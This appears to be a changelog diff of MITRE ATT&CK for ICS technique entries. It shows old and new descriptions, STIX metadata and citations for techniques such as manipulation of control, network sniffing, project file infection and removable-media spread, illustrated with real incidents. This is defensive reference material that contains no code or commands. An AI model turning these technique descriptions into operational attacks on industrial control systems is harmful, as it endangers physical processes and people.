>eters. Adversaries may manipulate control systems devices or>eters. Adversaries may manipulate control systems devices or
> possibly leverage their own, to communicate with and comman> possibly leverage their own, to communicate with and comman
>d physical control processes. The duration of manipulation m>d physical control processes. The duration of manipulation m
>ay be temporary or longer sustained, depending on operator d>ay be temporary or longer sustained, depending on operator d
>etection. Methods of Manipulation of Control include: Man-in>etection.     Methods of Manipulation of Control include:   
>-the-middle, Spoof command message, Changing setpoints. A Po>* Man-in-the-middle   * Spoof command message  * Changing se
>lish student used a remote controller device to interface wi>tpoints    A Polish student used a remote controller device 
>th the Lodz city tram system in Poland.(Citation: LondonReco>to interface with the Lodz city tram system in Poland. (Cita
>nnections Hacked Cyber Security Railways May 2017)(Citation:>tion: John Bill May 2017) (Citation: Shelley Smith February 
> InHomelandSecurity Hacker Poland February 2008)(Citation: S>2008) (Citation: Bruce Schneier January 2008) Using this rem
>chneier Hacking Polish Trams January 2008) Using this remote>ote, the student was able to capture and replay legitimate t
>, the student was able to capture and replay legitimate tram>ram signals. As a consequence, four trams were derailed and 
> signals. As a consequence, four trams were derailed and twe>twelve people injured due to resulting emergency stops. (Cit
>lve people injured due to resulting emergency stops.(Citatio>ation: Shelley Smith February 2008) The track controlling co
>n: InHomelandSecurity Hacker Poland February 2008)Using this>mmands issued may have also resulted in tram collisions, a f
> remote, the student was able to capture and replay legitima>urther risk to those on board and nearby the areas of impact
>te tram signals. As a consequence, four trams were derailed >. (Citation: Bruce Schneier January 2008)
>and twelve people injured due to resulting emergency stops.( 
>Citation: InHomelandSecurity Hacker Poland February 2008) Th 
>e track controlling commands issued may have also resulted i 
>n tram collisions, a further risk to those on board and near 
>by the areas of impact.(Citation: Schneier Hacking Polish Tr 
>ams January 2008) 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
values_changed
STIX FieldOld valueNew Value
modified2021-04-12 07:57:26.506000+00:002022-05-24 14:57:44.326000+00:00
descriptionAdversaries may manipulate physical process control within the industrial environment. Methods of manipulating control can include changes to set point values, tags, or other parameters. Adversaries may manipulate control systems devices or possibly leverage their own, to communicate with and command physical control processes. The duration of manipulation may be temporary or longer sustained, depending on operator detection. Methods of Manipulation of Control include: Man-in-the-middle, Spoof command message, Changing setpoints. A Polish student used a remote controller device to interface with the Lodz city tram system in Poland.(Citation: LondonReconnections Hacked Cyber Security Railways May 2017)(Citation: InHomelandSecurity Hacker Poland February 2008)(Citation: Schneier Hacking Polish Trams January 2008) Using this remote, the student was able to capture and replay legitimate tram signals. As a consequence, four trams were derailed and twelve people injured due to resulting emergency stops.(Citation: InHomelandSecurity Hacker Poland February 2008)Using this remote, the student was able to capture and replay legitimate tram signals. As a consequence, four trams were derailed and twelve people injured due to resulting emergency stops.(Citation: InHomelandSecurity Hacker Poland February 2008) The track controlling commands issued may have also resulted in tram collisions, a further risk to those on board and nearby the areas of impact.(Citation: Schneier Hacking Polish Trams January 2008)Adversaries may manipulate physical process control within the industrial environment. Methods of manipulating control can include changes to set point values, tags, or other parameters. Adversaries may manipulate control systems devices or possibly leverage their own, to communicate with and command physical control processes. The duration of manipulation may be temporary or longer sustained, depending on operator detection. Methods of Manipulation of Control include: * Man-in-the-middle * Spoof command message * Changing setpoints A Polish student used a remote controller device to interface with the Lodz city tram system in Poland. (Citation: John Bill May 2017) (Citation: Shelley Smith February 2008) (Citation: Bruce Schneier January 2008) Using this remote, the student was able to capture and replay legitimate tram signals. As a consequence, four trams were derailed and twelve people injured due to resulting emergency stops. (Citation: Shelley Smith February 2008) The track controlling commands issued may have also resulted in tram collisions, a further risk to those on board and nearby the areas of impact. (Citation: Bruce Schneier January 2008)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0831https://attack.mitre.org/techniques/T0831
external_references[1]['source_name']LondonReconnections Hacked Cyber Security Railways May 2017Bruce Schneier January 2008
external_references[1]['description']John Bill. (2017, May 12). Hacked Cyber Security Railways. Retrieved October 17, 2019.Bruce Schneier 2008, January 17 Hacking Polish Trams Retrieved. 2019/10/17
external_references[1]['url']https://www.londonreconnections.com/2017/hacked-cyber-security-railways/https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html
external_references[2]['source_name']InHomelandSecurity Hacker Poland February 2008John Bill May 2017
external_references[2]['description']Shelley Smith. (2008, February 12). Teen Hacker in Poland Plays Trains and Derails City Tram System. Retrieved October 17, 2019.John Bill 2017, May 12 Hacked Cyber Security Railways Retrieved. 2019/10/17
external_references[2]['url']https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/https://www.londonreconnections.com/2017/hacked-cyber-security-railways/
external_references[3]['source_name']Schneier Hacking Polish Trams January 2008Shelley Smith February 2008
external_references[3]['description']Bruce Schneier. (2008, January 17). Hacking Polish Trams. Retrieved October 17, 2019.Shelley Smith 2008, February 12 Teen Hacker in Poland Plays Trains and Derails City Tram System Retrieved. 2019/10/17
external_references[3]['url']https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.htmlhttps://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/

[T0832] Manipulation of View

Current version: 1.0

Version changed from: 0.0 → 1.0


Old Description
New Description
t1Adversaries may attempt to manipulate the information reportt1Adversaries may attempt to manipulate the information report
>ed back to operators or controllers. This manipulation may b>ed back to operators or controllers. This manipulation may b
>e short term or sustained. During this time the process itse>e short term or sustained. During this time the process itse
>lf could be in a much different state than what is reported.>lf could be in a much different state than what is reported.
> (Citation: Reference - Corero) (Citation: Reference - SANS > (Citation: Corero) (Citation: Michael J. Assante and Robert
>- 201510) (Citation: Reference - RIoT)   Operators may be fo> M. Lee) (Citation: Tyson Macaulay)   Operators may be foole
>oled into doing something that is harmful to the system in a>d into doing something that is harmful to the system in a lo
> loss of view situation. With a manipulated view into the sy>ss of view situation. With a manipulated view into the syste
>stems, operators may issue inappropriate control sequences t>ms, operators may issue inappropriate control sequences that
>hat introduce faults or catastrophic failures into the syste> introduce faults or catastrophic failures into the system. 
>m. Business analysis systems can also be provided with inacc>Business analysis systems can also be provided with inaccura
>urate data leading to bad management decisions.>te data leading to bad management decisions.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
external_referenceshttps://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false
values_changed
STIX FieldOld valueNew Value
modified2021-04-12 07:57:26.506000+00:002022-09-20 19:30:22.792000+00:00
descriptionAdversaries may attempt to manipulate the information reported back to operators or controllers. This manipulation may be short term or sustained. During this time the process itself could be in a much different state than what is reported. (Citation: Reference - Corero) (Citation: Reference - SANS - 201510) (Citation: Reference - RIoT) Operators may be fooled into doing something that is harmful to the system in a loss of view situation. With a manipulated view into the systems, operators may issue inappropriate control sequences that introduce faults or catastrophic failures into the system. Business analysis systems can also be provided with inaccurate data leading to bad management decisions.Adversaries may attempt to manipulate the information reported back to operators or controllers. This manipulation may be short term or sustained. During this time the process itself could be in a much different state than what is reported. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay) Operators may be fooled into doing something that is harmful to the system in a loss of view situation. With a manipulated view into the systems, operators may issue inappropriate control sequences that introduce faults or catastrophic failures into the system. Business analysis systems can also be provided with inaccurate data leading to bad management decisions.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0832https://attack.mitre.org/techniques/T0832
external_references[1]['source_name']Reference - CoreroCorero
external_references[1]['description']Corero. (n.d.). Industrial Control System (ICS) Security. Retrieved November 4, 2019.Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04
external_references[1]['url']https://www.corero.com/resources/files/whitepapers/cns%20whitepaper%20ics.pdfhttps://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf
external_references[2]['source_name']Reference - SANS - 201510Michael J. Assante and Robert M. Lee
external_references[2]['description']Michael J. Assante and Robert M. Lee. (n.d.). The Industrial Control System Cyber Kill Chain. Retrieved November 4, 2019.Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04
external_references[3]['source_name']Reference - RIoTTyson Macaulay
external_references[3]['description']Tyson Macaulay. (n.d.). RIoT Control: Understanding and Managing Risks and the Internet of Things. Retrieved November 4, 2019.Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04

[T0801] Monitor Process State

Current version: 1.0

Version changed from: 0.0 → 1.0

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0801https://attack.mitre.org/techniques/T0801

[T0834] Native API

Current version: 1.0

Version changed from: 0.0 → 1.0


Old Description
New Description
t1Adversaries may directly interact with the native OS applicat1Adversaries may directly interact with the native OS applica
>tion programming interface (API) to access system functions.>tion programming interface (API) to access system functions.
> Native APIs provide a controlled means of calling low-level> Native APIs provide a controlled means of calling low-level
> OS services within the kernel, such as those involving hard> OS services within the kernel, such as those involving hard
>ware/devices, memory, and processes.(Citation: EAttack Nativ>ware/devices, memory, and processes. (Citation: The MITRE Co
>e API) These native APIs are leveraged by the OS during syst>rporation May 2017) These native APIs are leveraged by the O
>em boot (when other system components are not yet initialize>S during system boot (when other system components are not y
>d) as well as carrying out tasks and requests during routine>et initialized) as well as carrying out tasks and requests d
> operations. Functionality provided by native APIs are often>uring routine operations.   Functionality provided by native
> also exposed to user-mode applications via interfaces and l> APIs are often also exposed to user-mode applications via i
>ibraries. For example, functions such as memcpy and direct o>nterfaces and libraries. For example, functions such as memc
>perations on memory registers can be used to modify user and>py and direct operations on memory registers can be used to 
> system memory space.>modify user and system memory space.

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-09-19 14:52:28.584000+00:00
descriptionAdversaries may directly interact with the native OS application programming interface (API) to access system functions. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: EAttack Native API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations. Functionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as memcpy and direct operations on memory registers can be used to modify user and system memory space.Adversaries may directly interact with the native OS application programming interface (API) to access system functions. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes. (Citation: The MITRE Corporation May 2017) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations. Functionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as memcpy and direct operations on memory registers can be used to modify user and system memory space.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0834https://attack.mitre.org/techniques/T0834
external_references[1]['source_name']EAttack Native APIThe MITRE Corporation May 2017
external_references[1]['description']The MITRE Corporation. (2017, May 31). ATT&CK T1106: Native API. Retrieved April 26, 2021.The MITRE Corporation 2017, May 31 ATT&CK T1106: Native API Retrieved. 2021/04/26

[T0842] Network Sniffing

Current version: 1.0

Version changed from: 0.0 → 1.0


Old Description
New Description
t1Network sniffing is the practice of using a network interfact1Network sniffing is the practice of using a network interfac
>e on a computer system to monitor or capture information (Ci>e on a computer system to monitor or capture information (Ci
>tation: EAttack Network Sniffing) regardless of whether it i>tation: Enterprise ATT&CK January 2018) regardless of whethe
>s the specified destination for the information.    An adver>r it is the specified destination for the information.   An 
>sary may attempt to sniff the traffic to gain information ab>adversary may attempt to sniff the traffic to gain informati
>out the target.  This information can vary in the level of i>on about the target. This information can vary in the level 
>mportance.  Relatively unimportant information is general co>of importance. Relatively unimportant information is general
>mmunications to and from machines.  Relatively important inf> communications to and from machines.  Relatively important 
>ormation would be login information.  User credentials may b>information would be login information. User credentials may
>e sent over an unencrypted protocol, such as [https://tools.> be sent over an unencrypted protocol, such as Telnet, that 
>ietf.org/html/rfc854 Telnet], that can be captured and obtai>can be captured and obtained through network packet analysis
>ned through network packet analysis. Network sniffing can be>.   In addition, ARP and Domain Name Service (DNS) poisoning
> a way to discover information for <span class="smw-format l> can be used to capture credentials to websites, proxies, an
>ist-format "><span class="smw-row"><span class="smw-field"><>d internal systems by redirecting traffic to an adversary.
>span class="smw-value">Control Device Identification</span>< 
>/span></span></span>.   In addition, ARP and Domain Name Ser 
>vice (DNS) poisoning can be used to capture credentials to w 
>ebsites, proxies, and internal systems by redirecting traffi 
>c to an adversary.  Detection: Detecting the events leading  
>up to sniffing network traffic may be the best method of det 
>ection. From the host level, an adversary would likely need  
>to perform a man-in-the-middle attack against other devices  
>on a wired network in order to capture traffic that was not  
>to or from the current compromised system. This change in th 
>e flow of information is detectable at the enclave network l 
>evel. Monitor for ARP spoofing and gratuitous ARP broadcasts 
>. Detecting compromised network devices is a bit more challe 
>nging. Auditing administrator logins, configuration changes, 
> and device images is required to detect malicious changes. 

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-09-20 19:22:11.937000+00:00
descriptionNetwork sniffing is the practice of using a network interface on a computer system to monitor or capture information (Citation: EAttack Network Sniffing) regardless of whether it is the specified destination for the information. An adversary may attempt to sniff the traffic to gain information about the target. This information can vary in the level of importance. Relatively unimportant information is general communications to and from machines. Relatively important information would be login information. User credentials may be sent over an unencrypted protocol, such as [https://tools.ietf.org/html/rfc854 Telnet], that can be captured and obtained through network packet analysis. Network sniffing can be a way to discover information for Control Device Identification. In addition, ARP and Domain Name Service (DNS) poisoning can be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary. Detection: Detecting the events leading up to sniffing network traffic may be the best method of detection. From the host level, an adversary would likely need to perform a man-in-the-middle attack against other devices on a wired network in order to capture traffic that was not to or from the current compromised system. This change in the flow of information is detectable at the enclave network level. Monitor for ARP spoofing and gratuitous ARP broadcasts. Detecting compromised network devices is a bit more challenging. Auditing administrator logins, configuration changes, and device images is required to detect malicious changes.Network sniffing is the practice of using a network interface on a computer system to monitor or capture information (Citation: Enterprise ATT&CK January 2018) regardless of whether it is the specified destination for the information. An adversary may attempt to sniff the traffic to gain information about the target. This information can vary in the level of importance. Relatively unimportant information is general communications to and from machines. Relatively important information would be login information. User credentials may be sent over an unencrypted protocol, such as Telnet, that can be captured and obtained through network packet analysis. In addition, ARP and Domain Name Service (DNS) poisoning can be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0842https://attack.mitre.org/techniques/T0842
external_references[1]['source_name']EAttack Network SniffingEnterprise ATT&CK January 2018
external_references[1]['description']Enterprise ATT&CK. (2018, January 11). Network Sniffing. Retrieved May 17, 2018.Enterprise ATT&CK 2018, January 11 Network Sniffing Retrieved. 2018/05/17

[T0845] Program Upload

Current version: 1.0

Version changed from: 0.0 → 1.0

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
values_changed
STIX FieldOld valueNew Value
modified2021-10-13 15:07:32.143000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0845https://attack.mitre.org/techniques/T0845

[T0873] Project File Infection

Current version: 1.0

Version changed from: 0.0 → 1.0


Old Description
New Description
t1Adversaries may attempt to infect project files with maliciot1Adversaries may attempt to infect project files with malicio
>us code. These project files may consist of objects, program>us code. These project files may consist of objects, program
> organization units, variables such as tags, documentation, > organization units, variables such as tags, documentation, 
>and other configurations needed for PLC programs to function>and other configurations needed for PLC programs to function
>. (Citation: References - beckhoff project files) Using buil>. (Citation: Beckhoff) Using built in functions of the engin
>t in functions of the engineering software, adversaries may >eering software, adversaries may be able to download an infe
>be able to download an infected program to a PLC in the oper>cted program to a PLC in the operating environment enabling 
>ating environment enabling further execution and persistence>further [execution](http://attacksite.mitre.org/tactics/TA01
> techniques. (Citation: References - plcdev siemens)  Advers>04/) and [persistence](http://attacksite.mitre.org/tactics/T
>aries may export their own code into project files with cond>A0110/) techniques. (Citation: PLCdev)   Adversaries may exp
>itions to execute at specific intervals. (Citation: Stuxnet >ort their own code into project files with conditions to exe
>- Symantec - 201102) Malicious programs allow adversaries co>cute at specific intervals. (Citation: Nicolas Falliere, Lia
>ntrol of all aspects of the process enabled by the PLC. Once>m O Murchu, Eric Chien February 2011) Malicious programs all
> the project file is downloaded to a PLC the workstation dev>ow adversaries control of all aspects of the process enabled
>ice may be disconnected with the infected project file still> by the PLC. Once the project file is downloaded to a PLC th
> executing. (Citation: References - plcdev siemens)>e workstation device may be disconnected with the infected p
 >roject file still executing. (Citation: PLCdev)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-09-20 18:37:59.276000+00:00
descriptionAdversaries may attempt to infect project files with malicious code. These project files may consist of objects, program organization units, variables such as tags, documentation, and other configurations needed for PLC programs to function. (Citation: References - beckhoff project files) Using built in functions of the engineering software, adversaries may be able to download an infected program to a PLC in the operating environment enabling further execution and persistence techniques. (Citation: References - plcdev siemens) Adversaries may export their own code into project files with conditions to execute at specific intervals. (Citation: Stuxnet - Symantec - 201102) Malicious programs allow adversaries control of all aspects of the process enabled by the PLC. Once the project file is downloaded to a PLC the workstation device may be disconnected with the infected project file still executing. (Citation: References - plcdev siemens)Adversaries may attempt to infect project files with malicious code. These project files may consist of objects, program organization units, variables such as tags, documentation, and other configurations needed for PLC programs to function. (Citation: Beckhoff) Using built in functions of the engineering software, adversaries may be able to download an infected program to a PLC in the operating environment enabling further [execution](http://attacksite.mitre.org/tactics/TA0104/) and [persistence](http://attacksite.mitre.org/tactics/TA0110/) techniques. (Citation: PLCdev) Adversaries may export their own code into project files with conditions to execute at specific intervals. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) Malicious programs allow adversaries control of all aspects of the process enabled by the PLC. Once the project file is downloaded to a PLC the workstation device may be disconnected with the infected project file still executing. (Citation: PLCdev)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0873https://attack.mitre.org/techniques/T0873
external_references[1]['source_name']Stuxnet - Symantec - 201102Beckhoff
external_references[1]['description']Nicolas Falliere, Liam O Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier (Version 1.4). Retrieved September 22, 2017.Beckhoff TwinCAT 3 Source Control: Project Files Retrieved. 2019/11/21
external_references[1]['url']https://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/w32%20stuxnet%20dossier.pdfhttps://infosys.beckhoff.com/english.php?content=../content/1033/tc3_sourcecontrol/18014398915785483.html&id=
external_references[2]['source_name']References - beckhoff project filesNicolas Falliere, Liam O Murchu, Eric Chien February 2011
external_references[2]['description']Beckhoff. (n.d.). TwinCAT 3 Source Control: Project Files. Retrieved November 21, 2019.Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22
external_references[2]['url']https://infosys.beckhoff.com/english.php?content=../content/1033/tc3%20sourcecontrol/18014398915785483.html&id=https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf
external_references[3]['source_name']References - plcdev siemensPLCdev
external_references[3]['description']PLCdev. (n.d.). Siemens SIMATIC Step 7 Programmer's Handbook. Retrieved November 21, 2019.PLCdev Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 Siemens SIMATIC Step 7 Programmer's Handbook Retrieved. 2019/11/21

[T0847] Replication Through Removable Media

Current version: 1.0

Version changed from: 0.0 → 1.0


Old Description
New Description
t1Adversaries may move onto systems, such as those separated ft1Adversaries may move onto systems, such as those separated f
>rom the enterprise network, by copying malware to removable >rom the enterprise network, by copying malware to removable 
>media which is inserted into the control systems environment>media which is inserted into the control systems environment
>. The adversary may rely on unknowing trusted third parties,>. The adversary may rely on unknowing trusted third parties,
> such as suppliers or contractors with access privileges, to> such as suppliers or contractors with access privileges, to
> introduce the removable media. This technique enables initi> introduce the removable media. This technique enables initi
>al access to target devices that never connect to untrusted >al access to target devices that never connect to untrusted 
>networks, but are physically accessible.   Operators of the >networks, but are physically accessible.       Operators of 
>German nuclear power plant, Gundremmingen, discovered malwar>the German nuclear power plant, Gundremmingen, discovered ma
>e on a facility computer not connected to the internet.  (Ci>lware on a facility computer not connected to the internet. 
>tation: KGG-Company-Site (Citation: KGG-Trend Micro) The m>(Citation: Kernkraftwerk Gundremmingen April 2016) (Citation
>alware included Conficker and W32.Ramnit, which were also fo>: Trend Micro April 2016) The malware included Conficker and
>und on eighteen removable disk drives in the facility.  (Cit> W32.Ramnit, which were also found on eighteen removable dis
>ation: KGG-Reuters (Citation: KGG-Softpedia)  (Citation: K>k drives in the facility. (Citation: Christoph Steitz, Eric 
>GG-Science-Alert)  (Citation: KGG-Geek)  (Citation: KGG-Ars)>Auchard April 2016) (Citation: Catalin Cimpanu April 2016) (
>  (Citation: KGG-Dark) The plant has since checked for infec>Citation: Peter Dockrill April 2016) (Citation: Lee Mathews 
>tion and cleaned up more than 1,000 computers.  (Citation: K>April 2016) (Citation: Sean Gallagher April 2016) (Citation:
>GG-BBC) An ESET researcher commented that internet disconnec> Dark Reading Staff April 2016The plant has since checked 
>tion does not guarantee system safety from infection or payl>for infection and cleaned up more than 1,000 computers. (Cit
>oad execution.  (Citation: KGG-ESET)>ation: BBC April 2016) An ESET researcher commented that int
 >ernet disconnection does not guarantee system safety from in
 >fection or payload execution. (Citation: ESET April 2016)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-09-20 19:18:25.490000+00:00
descriptionAdversaries may move onto systems, such as those separated from the enterprise network, by copying malware to removable media which is inserted into the control systems environment. The adversary may rely on unknowing trusted third parties, such as suppliers or contractors with access privileges, to introduce the removable media. This technique enables initial access to target devices that never connect to untrusted networks, but are physically accessible. Operators of the German nuclear power plant, Gundremmingen, discovered malware on a facility computer not connected to the internet. (Citation: KGG-Company-Site) (Citation: KGG-Trend Micro) The malware included Conficker and W32.Ramnit, which were also found on eighteen removable disk drives in the facility. (Citation: KGG-Reuters) (Citation: KGG-Softpedia) (Citation: KGG-Science-Alert) (Citation: KGG-Geek) (Citation: KGG-Ars) (Citation: KGG-Dark) The plant has since checked for infection and cleaned up more than 1,000 computers. (Citation: KGG-BBC) An ESET researcher commented that internet disconnection does not guarantee system safety from infection or payload execution. (Citation: KGG-ESET)Adversaries may move onto systems, such as those separated from the enterprise network, by copying malware to removable media which is inserted into the control systems environment. The adversary may rely on unknowing trusted third parties, such as suppliers or contractors with access privileges, to introduce the removable media. This technique enables initial access to target devices that never connect to untrusted networks, but are physically accessible. Operators of the German nuclear power plant, Gundremmingen, discovered malware on a facility computer not connected to the internet. (Citation: Kernkraftwerk Gundremmingen April 2016) (Citation: Trend Micro April 2016) The malware included Conficker and W32.Ramnit, which were also found on eighteen removable disk drives in the facility. (Citation: Christoph Steitz, Eric Auchard April 2016) (Citation: Catalin Cimpanu April 2016) (Citation: Peter Dockrill April 2016) (Citation: Lee Mathews April 2016) (Citation: Sean Gallagher April 2016) (Citation: Dark Reading Staff April 2016) The plant has since checked for infection and cleaned up more than 1,000 computers. (Citation: BBC April 2016) An ESET researcher commented that internet disconnection does not guarantee system safety from infection or payload execution. (Citation: ESET April 2016)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0847https://attack.mitre.org/techniques/T0847
external_references[1]['source_name']KGG-Company-SiteBBC April 2016
external_references[1]['description']Kernkraftwerk Gundremmingen. (2016, April 25). Detektion von Büro-Schadsoftware an mehreren Rechnern. Retrieved October 14, 2019.BBC 2016, April 28 German nuclear plant hit by computer viruses Retrieved. 2019/10/14
external_references[1]['url']https://www.kkw-gundremmingen.de/presse.php?id=571https://www.bbc.com/news/technology-36158606
external_references[2]['source_name']KGG-SoftpediaCatalin Cimpanu April 2016
external_references[2]['description']Catalin Cimpanu. (2016, April 26). Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary. Retrieved October 14, 2019.Catalin Cimpanu 2016, April 26 Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary Retrieved. 2019/10/14
external_references[3]['source_name']KGG-ReutersChristoph Steitz, Eric Auchard April 2016
external_references[3]['description']Christoph Steitz, Eric Auchard. (2016, April 26). German nuclear plant infected with computer viruses, operator says. Retrieved October 14, 2019.Christoph Steitz, Eric Auchard 2016, April 26 German nuclear plant infected with computer viruses, operator says Retrieved. 2019/10/14
external_references[4]['source_name']KGG-Science-AlertDark Reading Staff April 2016
external_references[4]['description']Peter Dockrill. (2016, April 28). Multiple Computer Viruses Have Been Discovered in This German Nuclear Plant. Retrieved October 14, 2019.Dark Reading Staff 2016, April 28 German Nuclear Power Plant Infected With Malware Retrieved. 2019/10/14
external_references[4]['url']https://www.sciencealert.com/multiple-computer-viruses-have-been-discovered-in-this-german-nuclear-planthttps://www.darkreading.com/endpoint/german-nuclear-power-plant-infected-with-malware/d/d-id/1325298
external_references[5]['source_name']KGG-ESETESET April 2016
external_references[5]['description']ESET. (2016, April 28). Malware found at a German nuclear power plant. Retrieved October 14, 2019.ESET 2016, April 28 Malware found at a German nuclear power plant Retrieved. 2019/10/14
external_references[6]['source_name']KGG-GeekKernkraftwerk Gundremmingen April 2016
external_references[6]['description']Lee Mathews. (2016, April 27). German nuclear plant found riddled with Conficker, other viruses. Retrieved October 14, 2019.Kernkraftwerk Gundremmingen 2016, April 25 Detektion von Bro-Schadsoftware an mehreren Rechnern Retrieved. 2019/10/14
external_references[6]['url']https://www.geek.com/apps/german-nuclear-plant-found-riddled-with-conficker-other-viruses-1653415/https://www.kkw-gundremmingen.de/presse.php?id=571
external_references[7]['source_name']KGG-Trend MicroLee Mathews April 2016
external_references[7]['description']Trend Micro. (2016, April 27). Malware Discovered in German Nuclear Power Plant. Retrieved October 14, 2019.Lee Mathews 2016, April 27 German nuclear plant found riddled with Conficker, other viruses Retrieved. 2019/10/14
external_references[7]['url']https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/malware-discovered-in-german-nuclear-power-planthttps://www.geek.com/apps/german-nuclear-plant-found-riddled-with-conficker-other-viruses-1653415/
external_references[8]['source_name']KGG-BBCPeter Dockrill April 2016
external_references[8]['description']BBC. (2016, April 28). German nuclear plant hit by computer viruses. Retrieved October 14, 2019.Peter Dockrill 2016, April 28 Multiple Computer Viruses Have Been Discovered in This German Nuclear Plant Retrieved. 2019/10/14
